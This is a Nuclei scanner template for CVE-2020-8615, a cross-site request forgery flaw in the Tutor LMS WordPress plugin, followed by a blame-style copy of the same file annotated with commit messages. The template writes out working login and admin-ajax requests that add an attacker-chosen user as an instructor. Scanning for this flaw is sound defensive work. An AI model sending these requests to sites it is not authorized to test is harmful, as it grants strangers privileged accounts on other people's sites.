nuclei-templates/http/cves/2020/CVE-2020-8615.yaml

id: CVE-2020-8615

info:
  name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery
  author: r3Y3r53
  severity: medium
  description: |
    A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).
  remediation: update to v.1.5.3
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-8615
    - https://wpscan.com/vulnerability/10058
    - http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html
    - https://wpvulndb.com/vulnerabilities/10058
    - https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
    cvss-score: 6.5
    cve-id: CVE-2020-8615
    cwe-id: CWE-352
    epss-score: 0.00658
    epss-percentile: 0.7719
    cpe: cpe:2.3:a:themeum:tutor_lms:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: themeum
    product: tutor_lms
    framework: wordpress
    publicwww-query: /wp-content/plugins/tutor/
  tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,themeum
variables:
  user: "{{rand_base(6)}}"
  pass: "{{rand_base(8)}}"
  email: "{{randstr}}@{{rand_base(5)}}.com"
  firstname: "{{rand_base(5)}}"
  lastname: "{{rand_base(5)}}"

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor

    matchers:
      - type: dsl
        dsl:
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'
          - 'status_code_2 == 200'
        condition: and
# digest: 4b0a00483046022100ce1356e0d5a972d45c2c6717b23c365faa90f713b56246d3f07862f983e51bfc022100d67d50f76e65a26f372e8433f097877c9e25b13996ae0b430458c30e7d83f22a:922c64590222798bb761d5b6d8e72950
templates added 2023-10-17 07:20:28 +00:00			`id: CVE-2020-8615`

			`info:`
fixed errors 2023-10-17 08:16:05 +00:00			`name: Wordpress Plugin Tutor LMS 1.5.3 - Cross-Site Request Forgery`
templates added 2023-10-17 07:20:28 +00:00			`author: r3Y3r53`
			`severity: medium`
			`description: \|`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`A CSRF vulnerability in the Tutor LMS plugin before 1.5.3 for WordPress can result in an attacker approving themselves as an instructor and performing other malicious actions (such as blocking legitimate instructors).`
templates added 2023-10-17 07:20:28 +00:00			`remediation: update to v.1.5.3`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-8615`
			`- https://wpscan.com/vulnerability/10058`
			`- http://packetstormsecurity.com/files/156585/WordPress-Tutor-LMS-1.5.3-Cross-Site-Request-Forgery.html`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`- https://wpvulndb.com/vulnerabilities/10058`
			`- https://www.getastra.com/blog/911/plugin-exploit/cross-site-request-forgery-in-tutor-lms-plugin/`
templates added 2023-10-17 07:20:28 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`
			`cvss-score: 6.5`
			`cve-id: CVE-2020-8615`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`cwe-id: CWE-352`
TemplateMan Update [Wed Oct 18 16:26:29 UTC 2023] :robot: 2023-10-18 16:26:30 +00:00			`epss-score: 0.00658`
TemplateMan Update [Tue Dec 12 11:07:51 UTC 2023] :robot: 2023-12-12 11:07:52 +00:00			`epss-percentile: 0.7719`
templates added 2023-10-17 07:20:28 +00:00			`cpe: cpe:2.3:a:themeum:tutor_lms::::::wordpress::*`
			`metadata:`
			`verified: true`
TemplateMan Update [Tue Oct 17 17:52:25 UTC 2023] :robot: 2023-10-17 17:52:26 +00:00			`max-request: 2`
			`vendor: themeum`
			`product: tutor_lms`
			`framework: wordpress`
			`publicwww-query: /wp-content/plugins/tutor/`
tags enhancements 2023-12-05 09:50:33 +00:00			`tags: wpscan,packetstorm,cve,cve2023,csrf,wp-plugin,wp,tutor,wordpress,themeum`
templates added 2023-10-17 07:20:28 +00:00			`variables:`
			`user: "{{rand_base(6)}}"`
			`pass: "{{rand_base(8)}}"`
			`email: "{{randstr}}@{{rand_base(5)}}.com"`
			`firstname: "{{rand_base(5)}}"`
			`lastname: "{{rand_base(5)}}"`

			`http:`
			`- raw:`
			`- \|`
			`POST /wp-login.php HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`log={{username}}&pwd={{password}}&wp-submit=Log+In`
			`- \|`
fixed errors 2023-10-17 08:16:05 +00:00			`POST /wp-admin/admin-ajax.php HTTP/1.1`
templates added 2023-10-17 07:20:28 +00:00			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`
fixed errors 2023-10-17 08:16:05 +00:00
templates added 2023-10-17 07:20:28 +00:00			`action=add_new_instructor&first_name={{firstname}}&last_name={{lastname}}&user_login={{user}}&email={{email}}&phone_number=1231231231&password={{pass}}&password_confirmation={{pass}}&tutor_profile_bio=Et+tempore+culpa+n&action=tutor_add_instructor`

			`matchers:`
			`- type: dsl`
			`dsl:`
			`- 'contains(content_type_2, "application/json")'`
			`- 'contains(body_2, "success") && contains(body_2, "true") && contains(body_2, "Instructor has been added successfully")'`
			`- 'status_code_2 == 200'`
			`condition: and`
Auto Template Signing [Tue Dec 12 12:02:03 UTC 2023] :robot: 2023-12-12 12:02:03 +00:00			`# digest: 4b0a00483046022100ce1356e0d5a972d45c2c6717b23c365faa90f713b56246d3f07862f983e51bfc022100d67d50f76e65a26f372e8433f097877c9e25b13996ae0b430458c30e7d83f22a:922c64590222798bb761d5b6d8e72950`